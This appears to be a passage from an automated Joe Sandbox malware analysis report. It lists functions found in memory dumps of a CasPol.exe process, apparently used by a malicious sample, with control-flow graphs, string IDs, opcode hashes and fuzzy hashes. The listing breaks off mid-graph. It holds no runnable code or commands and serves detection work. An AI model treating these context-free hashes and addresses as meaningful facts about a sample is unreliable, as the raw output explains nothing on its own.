                                                                                  control_flow_graph 0 d14c01-d14c35 TerminateThread call d006a9 3 d14de5 0->3 4 d14c3b-d14c8c 0->4 6 d14dea-d14e05 3->6 4->3 8 d14c92-d14c96 4->8 8->3 9 d14c9c-d14ca0 8->9 9->3 10 d14ca6-d14caa 9->10 10->3 12 d14cb0-d14cb4 10->12 12->3 13 d14cba-d14cbe 12->13 13->3 14 d14cc4-d14cd6 13->14 14->3 16 d14cdc-d14d29 14->16 18 d14d2a-d14d39 16->18 19 d14d55-d14da5 18->19 20 d14d3b-d14d44 18->20 24 d01657-d01672 19->24 25 d14da6-d14dd3 19->25 20->3 22 d14d4a-d14d4b 20->22 22->18 24->0 30 d14dd5-d14de0 25->30 31 d14de7 25->31 31->6
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28050906366.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_d00000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID: TerminateThread
                                                                                  • String ID: Q
                                                                                  • API String ID: 1852365436-3463352047
                                                                                  • Opcode ID: e011db77c84532eedb2634e8ac3f2a0d69d185ad2c61d308f7092a8b470d75ab
                                                                                  • Instruction ID: 310c264ef1453da6aaa54713bb38d9eb530f873d7a9bef130c2ae592f5966e95
                                                                                  • Opcode Fuzzy Hash: e011db77c84532eedb2634e8ac3f2a0d69d185ad2c61d308f7092a8b470d75ab
                                                                                  • Instruction Fuzzy Hash: F1315A38640307AFDF245AA8A8A47E273A29F12365FDC8267C8948B196D739C8C5C612
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D9ECE Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 33 1d3d9ece-1d3d9f64 38 1d3d9fae-1d3d9fb0 33->38 39 1d3d9f66-1d3d9f71 33->39 41 1d3d9fb2-1d3d9fca 38->41 39->38 40 1d3d9f73-1d3d9f7f 39->40 42 1d3d9f81-1d3d9f8b 40->42 43 1d3d9fa2-1d3d9fac 40->43 48 1d3d9fcc-1d3d9fd7 41->48 49 1d3da014-1d3da016 41->49 44 1d3d9f8d 42->44 45 1d3d9f8f-1d3d9f9e 42->45 43->41 44->45 45->45 47 1d3d9fa0 45->47 47->43 48->49 51 1d3d9fd9-1d3d9fe5 48->51 50 1d3da018-1d3da02a 49->50 58 1d3da031-1d3da05d 50->58 52 1d3da008-1d3da012 51->52 53 1d3d9fe7-1d3d9ff1 51->53 52->50 55 1d3d9ff5-1d3da004 53->55 56 1d3d9ff3 53->56 55->55 57 1d3da006 55->57 56->55 57->52 59 1d3da063-1d3da071 58->59 60 1d3da07a-1d3da0d7 59->60 61 1d3da073-1d3da079 59->61 68 1d3da0d9-1d3da0dd 60->68 69 1d3da0e7-1d3da0eb 60->69 61->60 68->69 70 1d3da0df-1d3da0e2 call 1d3d0d84 68->70 71 1d3da0ed-1d3da0f1 69->71 72 1d3da0fb-1d3da0ff 69->72 70->69 71->72 74 1d3da0f3-1d3da0f6 call 1d3d0d84 71->74 75 1d3da10f-1d3da113 72->75 76 1d3da101-1d3da105 72->76 74->72 78 1d3da115-1d3da119 75->78 79 1d3da123 75->79 76->75 77 1d3da107 76->77 77->75 78->79 81 1d3da11b 78->81 82 1d3da124 79->82 81->79 82->82
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VSn$\VSn
                                                                                  • API String ID: 0-668133529
                                                                                  • Opcode ID: c73ce18e47deb4b3874db41efa80e4de84a056aef6c66d7159e38716e215b47e
                                                                                  • Instruction ID: ea3e0b1afbacd0af32f27491e135dddade60971f5b3e85eb49c61450e8f4bdb8
                                                                                  • Opcode Fuzzy Hash: c73ce18e47deb4b3874db41efa80e4de84a056aef6c66d7159e38716e215b47e
                                                                                  • Instruction Fuzzy Hash: 2A717AB2E047098FDB50CFA8C9857EEBBF6BF88714F508129E404A7250DB759846CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D9ED8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 83 1d3d9ed8-1d3d9f64 86 1d3d9fae-1d3d9fb0 83->86 87 1d3d9f66-1d3d9f71 83->87 89 1d3d9fb2-1d3d9fca 86->89 87->86 88 1d3d9f73-1d3d9f7f 87->88 90 1d3d9f81-1d3d9f8b 88->90 91 1d3d9fa2-1d3d9fac 88->91 96 1d3d9fcc-1d3d9fd7 89->96 97 1d3da014-1d3da016 89->97 92 1d3d9f8d 90->92 93 1d3d9f8f-1d3d9f9e 90->93 91->89 92->93 93->93 95 1d3d9fa0 93->95 95->91 96->97 99 1d3d9fd9-1d3d9fe5 96->99 98 1d3da018-1d3da05d 97->98 107 1d3da063-1d3da071 98->107 100 1d3da008-1d3da012 99->100 101 1d3d9fe7-1d3d9ff1 99->101 100->98 103 1d3d9ff5-1d3da004 101->103 104 1d3d9ff3 101->104 103->103 105 1d3da006 103->105 104->103 105->100 108 1d3da07a-1d3da0d7 107->108 109 1d3da073-1d3da079 107->109 116 1d3da0d9-1d3da0dd 108->116 117 1d3da0e7-1d3da0eb 108->117 109->108 116->117 118 1d3da0df-1d3da0e2 call 1d3d0d84 116->118 119 1d3da0ed-1d3da0f1 117->119 120 1d3da0fb-1d3da0ff 117->120 118->117 119->120 122 1d3da0f3-1d3da0f6 call 1d3d0d84 119->122 123 1d3da10f-1d3da113 120->123 124 1d3da101-1d3da105 120->124 122->120 126 1d3da115-1d3da119 123->126 127 1d3da123 123->127 124->123 125 1d3da107 124->125 125->123 126->127 129 1d3da11b 126->129 130 1d3da124 127->130 129->127 130->130
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VSn$\VSn
                                                                                  • API String ID: 0-668133529
                                                                                  • Opcode ID: 1caee6769878fdd0d16df6cf693d71282d45ec9a1e6fa9cc1459f1e8b1a2054d
                                                                                  • Instruction ID: 0e3f9a0a18fff4b48550926e415482e16f03828b37ba2b0916c9bbeb8e380d00
                                                                                  • Opcode Fuzzy Hash: 1caee6769878fdd0d16df6cf693d71282d45ec9a1e6fa9cc1459f1e8b1a2054d
                                                                                  • Instruction Fuzzy Hash: 14717A72E047098FDB50CFA9C9817EEBBF2BF88714F508129E405A7254EB749846CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DCE22 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #&,P^$3&,P^
                                                                                  • API String ID: 0-1786835295
                                                                                  • Opcode ID: de4378247274800d1b31a7e13957f0232f12edad6e12dd7dae9ab6cd48d4572f
                                                                                  • Instruction ID: 727c91df12b88138ad680dd15f802478c3c28d0270bf0d47338ac294c6d77ce4
                                                                                  • Opcode Fuzzy Hash: de4378247274800d1b31a7e13957f0232f12edad6e12dd7dae9ab6cd48d4572f
                                                                                  • Instruction Fuzzy Hash: F7510536B187508FCB40FB78D0552AD7BF2AF89204B864929C24ADB350DF74995ACF93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D69C8 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 202 1d3d69c8-1d3d69d7 203 1d3d69fc-1d3d6a09 202->203 204 1d3d69d9-1d3d69e3 202->204 209 1d3d6a0b-1d3d6a31 203->209 210 1d3d6a72-1d3d6a78 203->210 205 1d3d69f8-1d3d69fb 204->205 206 1d3d69e5-1d3d69f6 call 1d3d2198 204->206 206->205 214 1d3d6a33-1d3d6a35 209->214 215 1d3d6a42-1d3d6a4a 209->215 216 1d3d6a7b-1d3d6a7e 210->216 217 1d3d6a3b-1d3d6a40 214->217 218 1d3d6a37-1d3d6a39 214->218 221 1d3d6a4c-1d3d6a5a 215->221 219 1d3d6a95-1d3d6a99 216->219 220 1d3d6a80-1d3d6a8e 216->220 217->221 218->221 223 1d3d6a9b-1d3d6aa9 219->223 224 1d3d6ab2-1d3d6ab5 219->224 220->219 232 1d3d6a90 220->232 230 1d3d6a5c-1d3d6a5e 221->230 231 1d3d6a70 221->231 223->224 239 1d3d6aab 223->239 227 1d3d6abd-1d3d6ae7 224->227 228 1d3d6ab7-1d3d6abb 224->228 249 1d3d6af2 227->249 228->227 229 1d3d6af4-1d3d6b0b 228->229 237 1d3d6b0d-1d3d6b0f 229->237 238 1d3d6b11-1d3d6b1d 229->238 235 1d3d6a67-1d3d6a6e 230->235 236 1d3d6a60-1d3d6a65 230->236 231->210 232->219 235->216 236->216 240 1d3d6b54-1d3d6b59 237->240 241 1d3d6b1f-1d3d6b25 238->241 242 1d3d6b27-1d3d6b31 238->242 239->224 244 1d3d6b39-1d3d6b43 241->244 242->244 245 1d3d6b33 242->245 248 1d3d6b4b-1d3d6b4d 244->248 245->244 248->240 249->240
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X-l$X-l
                                                                                  • API String ID: 0-3094341571
                                                                                  • Opcode ID: f5e0f83fb7e08638d77a6532ad02509280c5047ee9d41d884a0d4649e27fe0c4
                                                                                  • Instruction ID: 35e0e5f3f9141fc5c9e5b8e6210a5facea1ad8aa123a898a103cff7d7750d3df
                                                                                  • Opcode Fuzzy Hash: f5e0f83fb7e08638d77a6532ad02509280c5047ee9d41d884a0d4649e27fe0c4
                                                                                  • Instruction Fuzzy Hash: BF419EB270476A4BD7894675489237A77EAABC4200F86C23AC969CB3C1DB74CC45DB53
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D52F8 Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 250 1d3d52f8-1d3d534f call 1d3d028c 254 1d3d5358-1d3d5384 250->254 255 1d3d5351 250->255 257 1d3d538d-1d3d539f 254->257 258 1d3d5386-1d3d538c 254->258 255->254 259 1d3d53a7-1d3d53ab 257->259 258->257 260 1d3d53ad-1d3d53d3 259->260 261 1d3d540f-1d3d541f 259->261 268 1d3d53de-1d3d53e1 260->268 269 1d3d53d5-1d3d53dc 260->269 266 1d3d5435-1d3d543d 261->266 267 1d3d5421-1d3d542a 261->267 274 1d3d543f 266->274 275 1d3d5446-1d3d545f 266->275 285 1d3d542d call 1d3d56a1 267->285 286 1d3d542d call 1d3d56b0 267->286 271 1d3d53f1-1d3d53f8 268->271 272 1d3d53e3-1d3d53ea 268->272 269->271 271->259 281 1d3d53fa-1d3d5404 call 1d3d3854 271->281 272->271 274->275 279 1d3d546d 275->279 280 1d3d5461-1d3d5466 275->280 277 1d3d5433 277->275 283 1d3d546e 279->283 280->279 281->259 283->283 285->277 286->277
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: tQgn$tQgn
                                                                                  • API String ID: 0-2482053849
                                                                                  • Opcode ID: b313a747daff7cdc6acc603c5556b2bed6bc12033981f296b6e813f38162974f
                                                                                  • Instruction ID: 88a9c1c60010db28119ed98ea174e7110b2988d5d9164ddd06f932d0d92a54cf
                                                                                  • Opcode Fuzzy Hash: b313a747daff7cdc6acc603c5556b2bed6bc12033981f296b6e813f38162974f
                                                                                  • Instruction Fuzzy Hash: 37418771C00748DFDB50CFA5C5A97DDBFB4AF0A325FA08429D409AB280C7B62885CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D69A2 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 287 1d3d69a2-1d3d69a9 288 1d3d69ab-1d3d69b3 287->288 289 1d3d6a12-1d3d6a31 287->289 291 1d3d6a33-1d3d6a35 289->291 292 1d3d6a42-1d3d6a4a 289->292 293 1d3d6a3b-1d3d6a40 291->293 294 1d3d6a37-1d3d6a39 291->294 295 1d3d6a4c-1d3d6a5a 292->295 293->295 294->295 298 1d3d6a5c-1d3d6a5e 295->298 299 1d3d6a70-1d3d6a78 295->299 300 1d3d6a67-1d3d6a6e 298->300 301 1d3d6a60-1d3d6a65 298->301 303 1d3d6a7b-1d3d6a7e 299->303 300->303 301->303 304 1d3d6a95-1d3d6a99 303->304 305 1d3d6a80-1d3d6a8e 303->305 307 1d3d6a9b-1d3d6aa9 304->307 308 1d3d6ab2-1d3d6ab5 304->308 305->304 313 1d3d6a90 305->313 307->308 318 1d3d6aab 307->318 310 1d3d6abd-1d3d6ae7 308->310 311 1d3d6ab7-1d3d6abb 308->311 328 1d3d6af2 310->328 311->310 312 1d3d6af4-1d3d6b0b 311->312 316 1d3d6b0d-1d3d6b0f 312->316 317 1d3d6b11-1d3d6b1d 312->317 313->304 319 1d3d6b54-1d3d6b59 316->319 320 1d3d6b1f-1d3d6b25 317->320 321 1d3d6b27-1d3d6b31 317->321 318->308 323 1d3d6b39-1d3d6b43 320->323 321->323 324 1d3d6b33 321->324 327 1d3d6b4b-1d3d6b4d 323->327 324->323 327->319 328->319
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X-l$X-l
                                                                                  • API String ID: 0-3094341571
                                                                                  • Opcode ID: 5d9963124e87bd2e8976d95f64c8341894ff056f08e1b6f8432f867bcae5117d
                                                                                  • Instruction ID: 22ba995154dbd7bff90817fe79eff59fe4797f6f87e95e6887302624d5424311
                                                                                  • Opcode Fuzzy Hash: 5d9963124e87bd2e8976d95f64c8341894ff056f08e1b6f8432f867bcae5117d
                                                                                  • Instruction Fuzzy Hash: 3211ADF270471A07DBC5456505422B6939AAFC5114F95C23BCAADCB284DF71CC45EAA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD9F2 Relevance: 1.8, Strings: 1, Instructions: 528COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 329 1d3dd9f2-1d3de2c5 497 1d3de30a-1d3de331 329->497 498 1d3de2c7-1d3de2e3 329->498 503 1d3de33f 497->503 504 1d3de333 497->504 505 1d3de2fa-1d3de308 498->505 506 1d3de2e5-1d3de2e8 498->506 507 1d3de340 503->507 504->503 505->497 505->498 508 1d3de2f1-1d3de2f3 506->508 507->507 508->505
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: f67db27c9bd7396ddf4dee4dea3880d2a678fb0a456d04174825345c57b5939e
                                                                                  • Instruction ID: 575e5b65921b2099489936c33baf145cdf424ceb4ab62e2c9866038ea0d7a69c
                                                                                  • Opcode Fuzzy Hash: f67db27c9bd7396ddf4dee4dea3880d2a678fb0a456d04174825345c57b5939e
                                                                                  • Instruction Fuzzy Hash: 55327F74A002288FCB54DF74CCA87AEB7B6AF89304F504499D80AA7784DF71AEC58F55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DDA00 Relevance: 1.8, Strings: 1, Instructions: 522COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 510 1d3dda00-1d3de2c5 677 1d3de30a-1d3de331 510->677 678 1d3de2c7-1d3de2e3 510->678 683 1d3de33f 677->683 684 1d3de333 677->684 685 1d3de2fa-1d3de308 678->685 686 1d3de2e5-1d3de2e8 678->686 687 1d3de340 683->687 684->683 685->677 685->678 688 1d3de2f1-1d3de2f3 686->688 687->687 688->685
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH)l
                                                                                  • API String ID: 0-2491596382
                                                                                  • Opcode ID: ddd33e7de33457bdb7be6fab527c62db7c8723d49bb7931074221b6f6bab4571
                                                                                  • Instruction ID: e2530b8f83284efd6526df0af36b6a232c74312517b9ca6c58d550ba091046f1
                                                                                  • Opcode Fuzzy Hash: ddd33e7de33457bdb7be6fab527c62db7c8723d49bb7931074221b6f6bab4571
                                                                                  • Instruction Fuzzy Hash: B5328174A002288FCB54DF74CCA87AEB7B6AF89304F504499D80AA7784DF71AEC58F55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D41CA Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 690 1d3d41ca-1d3d41ea 691 1d3d41ec-1d3d41f0 690->691 692 1d3d4201-1d3d4214 690->692 693 1d3d456c-1d3d459b 691->693 694 1d3d41f6-1d3d41fe call 1d3d0164 691->694 698 1d3d421f-1d3d422c 692->698 699 1d3d4216-1d3d421c 692->699 703 1d3d459d-1d3d45a9 693->703 704 1d3d45d8 693->704 694->692 705 1d3d423c-1d3d4251 698->705 706 1d3d422e-1d3d4237 698->706 699->698 703->704 711 1d3d45ab-1d3d45b4 703->711 707 1d3d45da-1d3d45dd 704->707 712 1d3d432c-1d3d435a 705->712 713 1d3d4257-1d3d4264 705->713 706->712 711->704 717 1d3d45b6-1d3d45c4 711->717 749 1d3d435d call 1d3d45f0 712->749 750 1d3d435d call 1d3d45e0 712->750 713->712 718 1d3d426a-1d3d427e 713->718 717->704 722 1d3d45c6-1d3d45d4 717->722 723 1d3d42b8-1d3d42c9 718->723 724 1d3d4280-1d3d4286 718->724 722->704 734 1d3d45d6 722->734 732 1d3d42cd-1d3d42d9 723->732 733 1d3d42cb 723->733 726 1d3d428c-1d3d4298 724->726 727 1d3d4288-1d3d428a 724->727 725 1d3d4363-1d3d4365 728 1d3d4561-1d3d4569 725->728 731 1d3d429a-1d3d42a7 726->731 727->731 731->723 739 1d3d42a9-1d3d42b6 731->739 736 1d3d42db-1d3d42ea 732->736 733->736 734->707 742 1d3d4303-1d3d4307 736->742 739->723 743 1d3d42ec-1d3d4301 739->743 744 1d3d4309-1d3d4310 742->744 745 1d3d4312-1d3d4314 742->745 743->742 744->745 746 1d3d4319-1d3d4327 744->746 745->728 746->728 749->725 750->725
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d8.l
                                                                                  • API String ID: 0-4034604863
                                                                                  • Opcode ID: 0281534e282fcc924e2cf9a8c1942adf690b14c4c237266c641083589837ec7c
                                                                                  • Instruction ID: a14b6f89cb7f1c81eef8356b2e2d5d971d2da1e2d712f2ee7d94ed6132027e53
                                                                                  • Opcode Fuzzy Hash: 0281534e282fcc924e2cf9a8c1942adf690b14c4c237266c641083589837ec7c
                                                                                  • Instruction Fuzzy Hash: 3661A032B006198FCB44DFA8C445AED77B2BF88711F958169E906AB390CB30DC81CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD5D0 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 751 1d3dd5d0-1d3dd5d4 752 1d3dd56c 751->752 753 1d3dd5d6-1d3dd609 751->753 755 1d3dd572-1d3dd57f 752->755 757 1d3dd60f 753->757 758 1d3dd60b-1d3dd60d 753->758 761 1d3dd584-1d3dd587 755->761 760 1d3dd612-1d3dd61e 757->760 758->760 833 1d3dd621 call 1d3deabf 760->833 834 1d3dd621 call 1d3decb9 760->834 835 1d3dd621 call 1d3de438 760->835 836 1d3dd621 call 1d3df03b 760->836 837 1d3dd621 call 1d3dee35 760->837 838 1d3dd621 call 1d3dea37 760->838 839 1d3dd621 call 1d3de733 760->839 840 1d3dd621 call 1d3dedad 760->840 841 1d3dd621 call 1d3de9a9 760->841 842 1d3dd621 call 1d3de3aa 760->842 843 1d3dd621 call 1d3de6a5 760->843 844 1d3dd621 call 1d3dec25 760->844 845 1d3dd621 call 1d3defa7 760->845 846 1d3dd621 call 1d3de620 760->846 847 1d3dd621 call 1d3de91b 760->847 848 1d3dd621 call 1d3de896 760->848 849 1d3dd621 call 1d3deb91 760->849 850 1d3dd621 call 1d3def13 760->850 851 1d3dd621 call 1d3de592 760->851 852 1d3dd621 call 1d3de50d 760->852 853 1d3dd621 call 1d3de808 760->853 854 1d3dd621 call 1d3dea81 760->854 855 1d3dd621 call 1d3dda00 760->855 856 1d3dd621 call 1d3ded03 760->856 857 1d3dd621 call 1d3deafd 760->857 858 1d3dd621 call 1d3de47f 760->858 859 1d3dd621 call 1d3dee7f 760->859 860 1d3dd621 call 1d3de77a 760->860 861 1d3dd621 call 1d3de3f1 760->861 862 1d3dd621 call 1d3deff1 760->862 863 1d3dd621 call 1d3de9f0 760->863 864 1d3dd621 call 1d3dd9f2 760->864 865 1d3dd621 call 1d3de6ec 760->865 866 1d3dd621 call 1d3dec6f 760->866 867 1d3dd621 call 1d3dedeb 760->867 868 1d3dd621 call 1d3de667 760->868 869 1d3dd621 call 1d3de363 760->869 870 1d3dd621 call 1d3ded63 760->870 871 1d3dd621 call 1d3de962 760->871 872 1d3dd621 call 1d3de8dd 760->872 873 1d3dd621 call 1d3def5d 760->873 874 1d3dd621 call 1d3de5d9 760->874 875 1d3dd621 call 1d3debdb 760->875 876 1d3dd621 call 1d3de84f 760->876 877 1d3dd621 call 1d3deec9 760->877 878 1d3dd621 call 1d3de54b 760->878 879 1d3dd621 call 1d3deb47 760->879 880 1d3dd621 call 1d3de4c6 760->880 881 1d3dd621 call 1d3de7c1 760->881 882 1d3dd621 call 1d3de342 760->882 762 1d3dd589-1d3dd590 761->762 763 1d3dd597-1d3dd59a 761->763 767 1d3dd5c9-1d3dd5cc 762->767 768 1d3dd592 762->768 764 1d3dd59c 763->764 765 1d3dd5a7-1d3dd5aa 763->765 829 1d3dd59c call 1d3dd7fc 764->829 830 1d3dd59c call 1d3dd7b6 764->830 831 1d3dd59c call 1d3dd5e0 764->831 832 1d3dd59c call 1d3dd5d0 764->832 769 1d3dd5ac-1d3dd5b2 765->769 770 1d3dd5b7-1d3dd5b9 765->770 768->763 769->770 772 1d3dd5bb 770->772 773 1d3dd5c0-1d3dd5c3 770->773 771 1d3dd5a2 771->765 772->773 773->767 776 1d3dd4d1-1d3dd4d4 773->776 774 1d3dd627-1d3dd629 777 1d3dd62b-1d3dd631 774->777 778 1d3dd641-1d3dd685 774->778 776->762 781 1d3dd4da-1d3dd4dd 776->781 779 1d3dd635-1d3dd637 777->779 780 1d3dd633 777->780 785 1d3dd79d-1d3dd7b2 778->785 786 1d3dd68b-1d3dd797 778->786 779->778 780->778 783 1d3dd50f-1d3dd512 781->783 784 1d3dd4df-1d3dd504 781->784 788 1d3dd514-1d3dd51c 783->788 789 1d3dd523-1d3dd526 783->789 784->762 787 1d3dd50a 784->787 797 1d3dd7b3 785->797 786->785 787->783 788->784 791 1d3dd51e 788->791 792 1d3dd52d-1d3dd530 789->792 793 1d3dd528 789->793 791->789 794 1d3dd540-1d3dd543 792->794 795 1d3dd532-1d3dd53b 792->795 793->792 794->761 798 1d3dd545-1d3dd568 794->798 795->794 797->797 798->755 829->771 830->771 831->771 832->771 833->774 834->774 835->774 836->774 837->774 838->774 839->774 840->774 841->774 842->774 843->774 844->774 845->774 846->774 847->774 848->774 849->774 850->774 851->774 852->774 853->774 854->774 855->774 856->774 857->774 858->774 859->774 860->774 861->774 862->774 863->774 864->774 865->774 866->774 867->774 868->774 869->774 870->774 871->774 872->774 873->774 874->774 875->774 876->774 877->774 878->774 879->774 880->774 881->774 882->774
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR)l
                                                                                  • API String ID: 0-2684121311
                                                                                  • Opcode ID: f426c2ebe207c756e5b6acbc89ff8e60947c339e2f312c6b00c5aae42ec43f49
                                                                                  • Instruction ID: 6c225c4694480165a414d929f73ebd5f0f304dd34d718380d4cb8c73288fe6fe
                                                                                  • Opcode Fuzzy Hash: f426c2ebe207c756e5b6acbc89ff8e60947c339e2f312c6b00c5aae42ec43f49
                                                                                  • Instruction Fuzzy Hash: 4251D335F003159FDB449FB898982AE77B2AF8A214F508538E80AD7784DF74C84A8B49
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD5E0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 883 1d3dd5e0-1d3dd609 885 1d3dd60f 883->885 886 1d3dd60b-1d3dd60d 883->886 887 1d3dd612-1d3dd61e 885->887 886->887 927 1d3dd621 call 1d3deabf 887->927 928 1d3dd621 call 1d3decb9 887->928 929 1d3dd621 call 1d3de438 887->929 930 1d3dd621 call 1d3df03b 887->930 931 1d3dd621 call 1d3dee35 887->931 932 1d3dd621 call 1d3dea37 887->932 933 1d3dd621 call 1d3de733 887->933 934 1d3dd621 call 1d3dedad 887->934 935 1d3dd621 call 1d3de9a9 887->935 936 1d3dd621 call 1d3de3aa 887->936 937 1d3dd621 call 1d3de6a5 887->937 938 1d3dd621 call 1d3dec25 887->938 939 1d3dd621 call 1d3defa7 887->939 940 1d3dd621 call 1d3de620 887->940 941 1d3dd621 call 1d3de91b 887->941 942 1d3dd621 call 1d3de896 887->942 943 1d3dd621 call 1d3deb91 887->943 944 1d3dd621 call 1d3def13 887->944 945 1d3dd621 call 1d3de592 887->945 946 1d3dd621 call 1d3de50d 887->946 947 1d3dd621 call 1d3de808 887->947 948 1d3dd621 call 1d3dea81 887->948 949 1d3dd621 call 1d3dda00 887->949 950 1d3dd621 call 1d3ded03 887->950 951 1d3dd621 call 1d3deafd 887->951 952 1d3dd621 call 1d3de47f 887->952 953 1d3dd621 call 1d3dee7f 887->953 954 1d3dd621 call 1d3de77a 887->954 955 1d3dd621 call 1d3de3f1 887->955 956 1d3dd621 call 1d3deff1 887->956 957 1d3dd621 call 1d3de9f0 887->957 958 1d3dd621 call 1d3dd9f2 887->958 959 1d3dd621 call 1d3de6ec 